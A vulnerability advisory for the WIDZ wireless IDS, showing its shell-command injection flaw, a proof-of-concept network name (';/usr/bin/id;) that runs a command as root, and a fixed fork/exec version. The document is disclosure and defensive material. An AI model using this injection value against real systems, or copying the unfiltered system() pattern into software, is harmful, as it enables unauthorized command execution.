WIDZ is "the first Open Source wireless IDS that has the ability to detect rogue Access Points, Monkey-jacks, NULL probes, Floods, MAC Blacklist nodes, and ESSID blacklisted nodes, allowing you to catch bad guys in action". Due to inappropriate filtering of input, it is possible to cause the program to execute arbitrary commands.
Credit:
The information has been provided by KF.
Vulnerable systems:
* WIDZ version 1.5 and prior
Vulnerable code:
#include <stdio.h>
#include <stdlib.h>

void do_alert(char *target)
{
    char mess[100];
    if ( DEBUG )
        printf("Alert unknown AP %s\n", target);
    /* target is the ESSID seen on the air; it is pasted straight into a command line */
    sprintf(mess,"Alert 'unknown AP %s\n'", target);
    /* handed to /bin/sh -c, so quotes and ';' inside the ESSID are interpreted by the shell */
    system(mess);
    // Should do a check to see if we've alerted already but !!!
}
As you can see, system(mess) is executed without any filtering of the attacker-controlled ESSID, therefore it is possible to cause it to execute arbitrary code.
Go to an Apple AirPort and set the network name to ';/usr/bin/id; (or use HostAP instead):
snifz0r widz # ./widz_apmon 1 eth1 monitor
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file
At this point, the attacker can pretty much do what they wish. As a side note, this is not the only WIDZ program to make use of system() in this manner.
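The same alert written without a shell, as an added example that is not WIDZ code: the ESSID is validated against the 802.11 length limit and then passed as a single argv element to the alert program, so the quote-and-semicolon network name shown above reaches it verbatim and is never parsed as a command. /bin/echo stands in for the real Alert script, which is an assumption.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

#define ESSID_MAX 32   /* an 802.11 ESSID is at most 32 bytes */

/* Returns 1 if the ESSID is within the 802.11 limit and all printable ASCII.
 * This keeps alert text tidy; defence in depth, not the fix itself. */
int essid_is_sane(const char *essid)
{
    size_t n = strlen(essid);
    if (n == 0 || n > ESSID_MAX) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isprint((unsigned char)essid[i])) return 0;
    return 1;
}

/* The fix: no shell at all. fork/exec passes the message as one argv
 * element, so ';/usr/bin/id; is just text to the alert program.
 * Returns the child's exit status, or -1 on rejection or failure. */
int do_alert_safe(const char *target)
{
    if (!essid_is_sane(target)) {
        fprintf(stderr, "do_alert: rejected malformed ESSID\n");
        return -1;
    }
    char mess[ESSID_MAX + 32];              /* bounded, unlike sprintf into mess[100] */
    snprintf(mess, sizeof mess, "Alert unknown AP %s", target);

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* hypothetical alert command: /bin/echo stands in for WIDZ's Alert script */
        execl("/bin/echo", "echo", mess, (char *)NULL);
        _exit(127);                         /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```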